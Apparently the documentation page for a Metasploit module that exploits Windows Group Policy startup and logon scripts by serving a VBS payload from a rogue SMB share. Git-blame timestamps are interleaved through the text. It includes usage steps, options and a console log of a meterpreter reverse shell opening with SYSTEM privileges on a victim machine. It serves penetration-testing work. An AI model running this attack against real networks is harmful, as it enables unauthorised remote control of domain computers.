2019-12-04 20:31:59 -07:00
## Vulnerable Application
2019-12-12 16:57:38 -05:00
This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations.
This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges,
while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB
share to exploit it successfully.
Please note in some cases, it will take 5 to 10 minutes to receive a session.
2019-12-04 20:31:59 -07:00
2019-12-04 20:38:57 -07:00
More information available at [Gotham Digital Science Security ](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html )
2019-12-04 20:31:59 -07:00
## Verification Steps
2019-12-10 13:37:13 -07:00
1. Start msfconsole
2019-12-12 16:57:38 -05:00
2. Do: ```use modules/exploits/windows/smb/group_policy_startup` ``
3. Do: ```exploit` ``
2019-12-04 20:31:59 -07:00
## Options
2019-12-12 16:57:38 -05:00
**FILE_NAME **
2019-12-10 13:37:13 -07:00
VBS File name to share (Default: random .vbs)
2019-12-04 20:31:59 -07:00
2019-12-12 16:57:38 -05:00
**FOLDER_NAME **
2019-12-10 13:37:13 -07:00
Folder name to share (Default: none)
2019-12-04 20:31:59 -07:00
2019-12-12 16:57:38 -05:00
**SHARE **
2019-12-10 13:37:13 -07:00
Share name (Default: Random)
2019-12-04 20:31:59 -07:00
## Scenarios
2019-12-12 16:57:38 -05:00
### Domain Group Policy
In this scenario, the following computers are present:
1. Windows 7 (x64, Build 7601, SP1): Victim
2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller
The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
2020-01-28 14:28:18 -05:00
Theoretically, any computer in that `OU` would also execute the script on started up.
2019-12-04 20:31:59 -07:00
```
msf > use modules/exploits/windows/smb/group_policy_startup
msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
FILE_NAME => startup.vbs
msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
SHARE => scripts
msf exploit(windows/smb/group_policy_startup) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] File available on \\192.168.1.3\scripts\startup.vbs...
[*] Started service listener on 192.168.1.3:445
[*] Server started.
[*] Sending stage (180291 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
msf exploit(windows/smb/group_policy_startup) > sessions 1
[*] Starting interaction with 1...
2019-12-10 13:37:13 -07:00
meterpreter > sysinfo
2019-12-04 20:31:59 -07:00
Computer : MSF-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : MSF
Logged On Users : 1
Meterpreter : x86/windows
2019-12-10 13:37:13 -07:00
meterpreter > getuid
2019-12-04 20:31:59 -07:00
Server username: NT AUTHORITY\SYSTEM
` ``
